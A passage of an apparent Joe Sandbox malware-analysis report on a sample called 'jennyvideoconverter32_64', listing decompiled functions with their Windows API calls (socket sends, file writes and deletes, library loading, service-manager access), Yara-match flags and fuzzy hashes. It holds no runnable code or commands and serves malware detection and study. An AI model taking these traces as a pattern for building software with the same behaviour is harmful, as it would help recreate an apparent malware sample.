                                                                                  • Part of subcall function 02D95BB2: GetLastError.KERNEL32(76230A60,7622F550,02D95DA0,02D92F73,7622F550,?,02D8606D,00000104,76230A60,7622F550,ntdll.dll,?,?,?,02D86508), ref: 02D95BB4
                                                                                  • Part of subcall function 02D95BB2: __calloc_crt.LIBCMT ref: 02D95BD5
                                                                                  • Part of subcall function 02D95BB2: __initptd.LIBCMT ref: 02D95BF7
                                                                                  • Part of subcall function 02D95BB2: GetCurrentThreadId.KERNEL32 ref: 02D95BFE
                                                                                  • Part of subcall function 02D95BB2: SetLastError.KERNEL32(00000000,02D8606D,00000104,76230A60,7622F550,ntdll.dll,?,?,?,02D86508), ref: 02D95C16
                                                                                • __freeptd.LIBCMT ref: 02D933F4
                                                                                  • Part of subcall function 02D934D9: LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02D933F3), ref: 02D934F3
                                                                                  • Part of subcall function 02D934D9: GetProcAddress.KERNEL32(00000000), ref: 02D934FA
                                                                                  • Part of subcall function 02D934D9: RtlEncodePointer.NTDLL(00000000), ref: 02D93505
                                                                                  • Part of subcall function 02D934D9: RtlDecodePointer.NTDLL(02D933F3), ref: 02D93520
                                                                                • RtlExitUserThread.NTDLL(?,00000000,?,02D933B6,00000000), ref: 02D933FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastPointerThread$AddressCurrentDecodeEncodeExitLibraryLoadProcUser__calloc_crt__freeptd__getptd_noexit__initptd
                                                                                • String ID:
                                                                                • API String ID: 2811226776-0
                                                                                • Opcode ID: 7de24039e75dbdf0909f8198a98cac44ee1948e834c40de40d6b9aa21396e3e6
                                                                                • Instruction ID: 8713e86efe22df076081f4dd931556dbd745cf83f8fbd99d98f8cf063bdf142c
                                                                                • Opcode Fuzzy Hash: 7de24039e75dbdf0909f8198a98cac44ee1948e834c40de40d6b9aa21396e3e6
                                                                                • Instruction Fuzzy Hash: EBD0A730502A15A7EF633720E405B4F7659EF01728F440064F481053048F605D81C9E6
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002DBA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DBA000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2dba000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: `io
                                                                                • API String ID: 823142352-3782016954
                                                                                • Opcode ID: 22de838a69165d44cc5e03d25e8e1bd2f3002673d603686f54c8cb3b43d18f4c
                                                                                • Instruction ID: e1dddb20988765f11a1bf7a9cb239a997f6e5b4e5dd66cb4bd80b9446aea6bc1
                                                                                • Opcode Fuzzy Hash: 22de838a69165d44cc5e03d25e8e1bd2f3002673d603686f54c8cb3b43d18f4c
                                                                                • Instruction Fuzzy Hash: AB416CF150C604AFE719BF19EC8177AB7E5EF84310F06882DE6C487740EA3568548B97
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D84BF2
                                                                                  • Part of subcall function 02D81BA7: __EH_prolog.LIBCMT ref: 02D81BAC
                                                                                  • Part of subcall function 02D81BA7: RtlEnterCriticalSection.NTDLL ref: 02D81BBC
                                                                                  • Part of subcall function 02D81BA7: RtlLeaveCriticalSection.NTDLL ref: 02D81BEA
                                                                                  • Part of subcall function 02D81BA7: RtlEnterCriticalSection.NTDLL ref: 02D81C13
                                                                                  • Part of subcall function 02D81BA7: RtlLeaveCriticalSection.NTDLL ref: 02D81C56
                                                                                  • Part of subcall function 02D8E02B: __EH_prolog.LIBCMT ref: 02D8E030
                                                                                  • Part of subcall function 02D8E02B: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D8E0AF
                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 02D84CF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                • String ID:
                                                                                • API String ID: 1927618982-0
                                                                                • Opcode ID: 0271a8902d253098c953437cbbc87aa5d55c641fdf1a189222444c69a553b072
                                                                                • Instruction ID: 664aa61bb83514d2925b295816f8ff2c440ef433161ee5a639a47828c5b73e43
                                                                                • Opcode Fuzzy Hash: 0271a8902d253098c953437cbbc87aa5d55c641fdf1a189222444c69a553b072
                                                                                • Instruction Fuzzy Hash: 25512771D04249DFDB15EFA8D484AEEBBB9EF08314F14809AE905AB351E7309E44CFA0
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D82D47
                                                                                • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D82D5C
                                                                                  • Part of subcall function 02D8A43C: WSAGetLastError.WS2_32(00000000,?,?,02D82A51), ref: 02D8A44A
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$Send
                                                                                • String ID:
                                                                                • API String ID: 1282938840-0
                                                                                • Opcode ID: f96539b2847ec7f5d1f2da1b93667a550a6a68bcd4594be1e7ddbe7cf82cc017
                                                                                • Instruction ID: 2a079a53823f7d61bc20275442e4d4c1fc8c531fa195507b7dd88bd2f422f17f
                                                                                • Opcode Fuzzy Hash: f96539b2847ec7f5d1f2da1b93667a550a6a68bcd4594be1e7ddbe7cf82cc017
                                                                                • Instruction Fuzzy Hash: E9015EB5504205EFDB206F95984886FBBE9FB45365B20452EF89983300EB709D00CBA1
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D8833A
                                                                                • shutdown.WS2_32(?,00000002), ref: 02D88343
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastshutdown
                                                                                • String ID:
                                                                                • API String ID: 1920494066-0
                                                                                • Opcode ID: 220b2341fc38f6c51e27953f2c10b3a77dc86b25c02c8990c176e3e7bf506c07
                                                                                • Instruction ID: a1a694f37960fc64f17cdec6f7aa197aad264f834f5a332f50119ffe3052487a
                                                                                • Opcode Fuzzy Hash: 220b2341fc38f6c51e27953f2c10b3a77dc86b25c02c8990c176e3e7bf506c07
                                                                                • Instruction Fuzzy Hash: 70F01771A44318CFDB20AF68E404B9AB7E5FF09721F408819E9AAD7380D730AC10DBA5
                                                                                APIs
                                                                                • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402DBF,00000000), ref: 00403A01
                                                                                  • Part of subcall function 004038A8: GetVersionExA.KERNEL32 ref: 004038C7
                                                                                • HeapDestroy.KERNEL32 ref: 00403A40
                                                                                  • Part of subcall function 00403DC7: HeapAlloc.KERNEL32(00000000,00000140,00403A29,000003F8), ref: 00403DD4
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocCreateDestroyVersion
                                                                                • String ID:
                                                                                • API String ID: 2507506473-0
                                                                                • Opcode ID: 08f14aee262382775140a5fb38b16d88e88289f6ea168ffb6a246c9e47cbf934
                                                                                • Instruction ID: 5dadef9d12e489db140da5c14b34350ea54a5b880f3286d9e4ff1a1591b79aa3
                                                                                • Opcode Fuzzy Hash: 08f14aee262382775140a5fb38b16d88e88289f6ea168ffb6a246c9e47cbf934
                                                                                • Instruction Fuzzy Hash: 04F065707553016ADB24EF705E4676B3DD8AB80B53F10443BF541F41E0EB7C8690991A
                                                                                APIs
                                                                                • lstrcmpiW.KERNELBASE(?,/chk), ref: 0040B95C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcmpi
                                                                                • String ID: /chk
                                                                                • API String ID: 1586166983-3837807730
                                                                                • Opcode ID: af6fa81dad960db4c1e64f221b36a3390aa195560f18da386ed3a98d31594a07
                                                                                • Instruction ID: 495c3e075edc24a6fcc213445aa4e79cffea7e25fd33ba9b7d8bb21698b3df4f
                                                                                • Opcode Fuzzy Hash: af6fa81dad960db4c1e64f221b36a3390aa195560f18da386ed3a98d31594a07
                                                                                • Instruction Fuzzy Hash: ECB092B0288B02FAD6022B624E086117A70AA147013218136E813B42E4C7BAA421F6AE
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D8511E
                                                                                  • Part of subcall function 02D83D7E: htons.WS2_32(?), ref: 02D83DA2
                                                                                  • Part of subcall function 02D83D7E: htonl.WS2_32(00000000), ref: 02D83DB9
                                                                                  • Part of subcall function 02D83D7E: htonl.WS2_32(00000000), ref: 02D83DC0
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: htonl$H_prologhtons
                                                                                • String ID:
                                                                                • API String ID: 4039807196-0
                                                                                • Opcode ID: 0b496904cfbc03273e89227421944ecae251e4bfe6b6881a71cca91e6ee947f9
                                                                                • Instruction ID: f3c075348957c0595ef6c0235a04661be9325a568ace1f534f493c089a6dd651
                                                                                • Opcode Fuzzy Hash: 0b496904cfbc03273e89227421944ecae251e4bfe6b6881a71cca91e6ee947f9
                                                                                • Instruction Fuzzy Hash: 508127B5D0424E8ECF05EFA8E040AEEBBB9EF48210F10815AD855B7340EB755A05CF75
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog
                                                                                • String ID:
                                                                                • API String ID: 3519838083-0
                                                                                • Opcode ID: f8859951af11535c4d7db5cb41bd7c14097f499bcc6b8edba717c907f9406fa4
                                                                                • Instruction ID: 9cbe7e304b41e62357a02fb2fbb2e43049943641d083feeedaf8fd516c082638
                                                                                • Opcode Fuzzy Hash: f8859951af11535c4d7db5cb41bd7c14097f499bcc6b8edba717c907f9406fa4
                                                                                • Instruction Fuzzy Hash: F241077190120EAFCF04EF99D890EEEBBBAFF88314F54416AE545A7240D7749A45CFA0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002DBA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DBA000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2dba000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: adc81ab58179cf194ea68349e0dc1a25fe6f2d244e2843d209253108725c740a
                                                                                • Instruction ID: d294e4bb90a95ceb7762ef4c44c41666c2673456d9e755c688a38d278597435f
                                                                                • Opcode Fuzzy Hash: adc81ab58179cf194ea68349e0dc1a25fe6f2d244e2843d209253108725c740a
                                                                                • Instruction Fuzzy Hash: 0A4141B250C610AFE7156E19DC85BAABBE9EF94720F06492DEBC883740D63558408BDB
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002DBA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DBA000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2dba000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: DeleteFile
                                                                                • String ID:
                                                                                • API String ID: 4033686569-0
                                                                                • Opcode ID: f3ef28c9098564d07ae337382e149d342a29a769a9454d9c368cd47cc928549e
                                                                                • Instruction ID: 52cd15f7d858df478c1ecd1296751d19e1824bd1769c185215a1a932b451d954
                                                                                • Opcode Fuzzy Hash: f3ef28c9098564d07ae337382e149d342a29a769a9454d9c368cd47cc928549e
                                                                                • Instruction Fuzzy Hash: CB2145F260C600AFE305AF19ED557BEFBE9EF94720F16892EE2C5C2710D67548408A97
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D8E8F9
                                                                                  • Part of subcall function 02D81A01: TlsGetValue.KERNEL32 ref: 02D81A0A
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologValue
                                                                                • String ID:
                                                                                • API String ID: 3700342317-0
                                                                                • Opcode ID: fb403a29094ad452e8a02020587006795a677b238848b787992dca12efb898d4
                                                                                • Instruction ID: 32959a3388341867b84f489d3158ccd97149871ec7102f8a2802e7d183289469
                                                                                • Opcode Fuzzy Hash: fb403a29094ad452e8a02020587006795a677b238848b787992dca12efb898d4
                                                                                • Instruction Fuzzy Hash: 6C211BB2D04209AFDB04EFA4D940AEEBBF9EB49314F14451AE919A7340D771AD05CFB1
                                                                                APIs
                                                                                • WriteFile.KERNELBASE(79E8203A), ref: 02DF7B95
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002DBA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DBA000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2dba000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: 0ce4c7f90b7b3b8e5597eefd4ad77aa7476d04211c1c985ebeafa6aaffbc8b5c
                                                                                • Instruction ID: 2cd82635fecbaf99f129c4b59b225afd0d1ac011a42da678b1e2ccabb6a7a23a
                                                                                • Opcode Fuzzy Hash: 0ce4c7f90b7b3b8e5597eefd4ad77aa7476d04211c1c985ebeafa6aaffbc8b5c
                                                                                • Instruction Fuzzy Hash: C81114B260C7049BE3157F09D8857BAFBE4EF54720F02492DD7C947740E635A8548B9B
                                                                                APIs
                                                                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02D833CC
                                                                                  • Part of subcall function 02D832AB: __EH_prolog.LIBCMT ref: 02D832B0
                                                                                  • Part of subcall function 02D832AB: RtlEnterCriticalSection.NTDLL(?), ref: 02D832C3
                                                                                  • Part of subcall function 02D832AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02D832EF
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                                                • String ID:
                                                                                • API String ID: 1518410164-0
                                                                                • Opcode ID: a1d3c2145e30022230e2670bc23fc21a840eb7d0226992f8c685bb1125ddd0e9
                                                                                • Instruction ID: 104907299b4974926bdf16b9e8996ba35b55e43488be30a2e03a80c289b4b8d4
                                                                                • Opcode Fuzzy Hash: a1d3c2145e30022230e2670bc23fc21a840eb7d0226992f8c685bb1125ddd0e9
                                                                                • Instruction Fuzzy Hash: 50018070214606AFD704EF59D885F55BBA9FF44720F10835AE828873C0EB71EC21CBA4
                                                                                APIs
                                                                                  • Part of subcall function 02D8D2F7: __EH_prolog.LIBCMT ref: 02D8D2FC
                                                                                • __CxxThrowException@8.LIBCMT ref: 02D8DBE1
                                                                                  • Part of subcall function 02D9449A: RaiseException.KERNEL32(?,?,02D8FA92,?,?,?,?,?,?,?,02D8FA92,?,02DB0F78,?), ref: 02D944EF
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionException@8H_prologRaiseThrow
                                                                                • String ID:
                                                                                • API String ID: 1681477883-0
                                                                                • Opcode ID: d8af6f4dca250fc28a1a0bfb4773cb6e1bff9b9b43b4a1337e30d46bac16d633
                                                                                • Instruction ID: f400849eeb2d909f24a3c8a620a6c59b78b2f8afec99349d0c6207a4a8c9c4b2
                                                                                • Opcode Fuzzy Hash: d8af6f4dca250fc28a1a0bfb4773cb6e1bff9b9b43b4a1337e30d46bac16d633
                                                                                • Instruction Fuzzy Hash: 7CF04F71910209ABD718ABA9D849DAB73FDDB08714F40055DF60A93640EAA1F8158BB1
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D8E489
                                                                                  • Part of subcall function 02D826DB: RtlEnterCriticalSection.NTDLL(?), ref: 02D82706
                                                                                  • Part of subcall function 02D826DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D8272B
                                                                                  • Part of subcall function 02D826DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02DA5A93), ref: 02D82738
                                                                                  • Part of subcall function 02D826DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02D82778
                                                                                  • Part of subcall function 02D826DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02D827D9
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                • String ID:
                                                                                • API String ID: 4293676635-0
                                                                                • Opcode ID: acd5bbd5d2fff9ad84add6282ca517acfb0f097bc39fdaafcf7869a5e5c606ae
                                                                                • Instruction ID: eea50c5a0df8e7aed3faa2cd10c1a85d39cf6b716cb0e4879f708607eb1e488d
                                                                                • Opcode Fuzzy Hash: acd5bbd5d2fff9ad84add6282ca517acfb0f097bc39fdaafcf7869a5e5c606ae
                                                                                • Instruction Fuzzy Hash: A001DCB0910B148FC718CF1AC154986FBF5EF88310B05C5AE944A8B721E3B1EA40CFA0
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D8E268
                                                                                  • Part of subcall function 02D93A8F: _malloc.LIBCMT ref: 02D93AA7
                                                                                  • Part of subcall function 02D8E484: __EH_prolog.LIBCMT ref: 02D8E489
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$_malloc
                                                                                • String ID:
                                                                                • API String ID: 4254904621-0
                                                                                • Opcode ID: cdd2772d9dca7587b33602f0e9c16dc8655045bfe0d7ed1f4d23e7b3128fb9b6
                                                                                • Instruction ID: 75a92c78830a9bd84359b23a9a613bd57a10149dae093aa604a535b62d9c34c1
                                                                                • Opcode Fuzzy Hash: cdd2772d9dca7587b33602f0e9c16dc8655045bfe0d7ed1f4d23e7b3128fb9b6
                                                                                • Instruction Fuzzy Hash: B6E01271A15115ABDF5DEFA9E811B7D77A6EB44300F0086ADB809D6740DB70DD008E65
                                                                                APIs
                                                                                  • Part of subcall function 02D95B9A: __getptd_noexit.LIBCMT ref: 02D95B9B
                                                                                  • Part of subcall function 02D95B9A: __amsg_exit.LIBCMT ref: 02D95BA8
                                                                                  • Part of subcall function 02D933D6: __getptd_noexit.LIBCMT ref: 02D933DA
                                                                                  • Part of subcall function 02D933D6: __freeptd.LIBCMT ref: 02D933F4
                                                                                  • Part of subcall function 02D933D6: RtlExitUserThread.NTDLL(?,00000000,?,02D933B6,00000000), ref: 02D933FD
                                                                                • __XcptFilter.LIBCMT ref: 02D933C2
                                                                                  • Part of subcall function 02D98CD4: __getptd_noexit.LIBCMT ref: 02D98CD8
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                • String ID:
                                                                                • API String ID: 1405322794-0
                                                                                • Opcode ID: 62430052743222c1b5183760751d2cd9468cbae44347fc31151cd4958ea7f39b
                                                                                • Instruction ID: d708eb001f04afcaf629fd40972b027859264f46c3cbf768aa146d0ef523b25c
                                                                                • Opcode Fuzzy Hash: 62430052743222c1b5183760751d2cd9468cbae44347fc31151cd4958ea7f39b
                                                                                • Instruction Fuzzy Hash: 88E0B6B5945604AFEB08ABA0D915F6E7766EF45706F200188F1029B361DA759D40AE30
                                                                                APIs
                                                                                • WriteFile.KERNELBASE(168B68CD), ref: 02DED270
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002DBA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DBA000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2dba000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: 7c7a61f9f284e03bda672f2fa3dc2ba8de4ab054bff9a7b146fe7ad3ed443882
                                                                                • Instruction ID: a05fb5b362fdcbaec1b307395711fd071b2bbc50f7fc16a623156b4326397a8c
                                                                                • Opcode Fuzzy Hash: 7c7a61f9f284e03bda672f2fa3dc2ba8de4ab054bff9a7b146fe7ad3ed443882
                                                                                • Instruction Fuzzy Hash: 1BD06CF058CA08CBD7557F49DC8567DFBE8AF41301F12485C82E686750EA748888CB9A
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: ManagerOpen
                                                                                • String ID:
                                                                                • API String ID: 1889721586-0
                                                                                • Opcode ID: 8264c35b346934b1a34de84308aa6ba0c3dc43f738d8b3d182250907c2d0be6e
                                                                                • Instruction ID: cf44c9507d41d844d4e08f7d14fcdcefca16c4e82706d54fd6ba5a2fce2703a3
                                                                                • Opcode Fuzzy Hash: 8264c35b346934b1a34de84308aa6ba0c3dc43f738d8b3d182250907c2d0be6e
                                                                                • Instruction Fuzzy Hash: E2C012B004C302EAC2A08A200FE883A219CC124384B708837A207B91D6D37D091BB9BF
                                                                                APIs
                                                                                • LoadLibraryExA.KERNELBASE(?,00000000), ref: 0040B8EC
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 11852e692feb5fc0fe2d537e4d4718d73ee6626a7552695eefc9478bb5382bb0
                                                                                • Instruction ID: ca2f13da04a3db2b3b4b96cdd5c8feaaa244f5f3b1ba8505971a5640bbb5702b
                                                                                • Opcode Fuzzy Hash: 11852e692feb5fc0fe2d537e4d4718d73ee6626a7552695eefc9478bb5382bb0
                                                                                • Instruction Fuzzy Hash: 50D02230200212DBCB005BB4CD68B6436B0FF427A0F008636FC12FC4D0C3B180027A0A
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: Open
                                                                                • String ID:
                                                                                • API String ID: 71445658-0
                                                                                • Opcode ID: 23fe80eec49aeeb1678493c446eb42f43d3f12bada28fb0827316aa0324d5972
                                                                                • Instruction ID: 1c57bc09d8bf22a48340e4eb788f302c9c1bfc31f98e5d519a64d6cb0c2937c0
                                                                                • Opcode Fuzzy Hash: 23fe80eec49aeeb1678493c446eb42f43d3f12bada28fb0827316aa0324d5972
                                                                                • Instruction Fuzzy Hash: C6C00270504106EAD7448A928E5866D66A46708345F20457B8803B11C5D3B9C155592E
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(00409F90), ref: 0040B9B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: LocalTime
                                                                                • String ID:
                                                                                • API String ID: 481472006-0
                                                                                • Opcode ID: ebd2a821f356bc171f27cbc6d7b5de8ef6eae71528622997e5226e3dbc7ec01b
                                                                                • Instruction ID: a7f967e1ebb2f7ebd95cfc360c7a78c232a595a08d73ceb3f1a41a67e7c67032
                                                                                • Opcode Fuzzy Hash: ebd2a821f356bc171f27cbc6d7b5de8ef6eae71528622997e5226e3dbc7ec01b
                                                                                • Instruction Fuzzy Hash: 4BC08CB1808402EECB00AB62894602932E4DA58386321803BC003F30A0D73C8402DF9F
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: CopyFile
                                                                                • String ID:
                                                                                • API String ID: 1304948518-0
                                                                                • Opcode ID: 9941e5161190b93204a8f50b1f4f5bc0fef5feafe68d5a0c3e5b2582f36667c7
                                                                                • Instruction ID: 92994eed6788655cd6e8b5697041bbc974fe699f59b47debdc455bcc225c985b
                                                                                • Opcode Fuzzy Hash: 9941e5161190b93204a8f50b1f4f5bc0fef5feafe68d5a0c3e5b2582f36667c7
                                                                                • Instruction Fuzzy Hash: AEB01294148012FED1000E155EC8F37221CD8483D532504723003F00C0D37C444275BF
                                                                                APIs
                                                                                • CreateDirectoryA.KERNELBASE ref: 004025F9
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
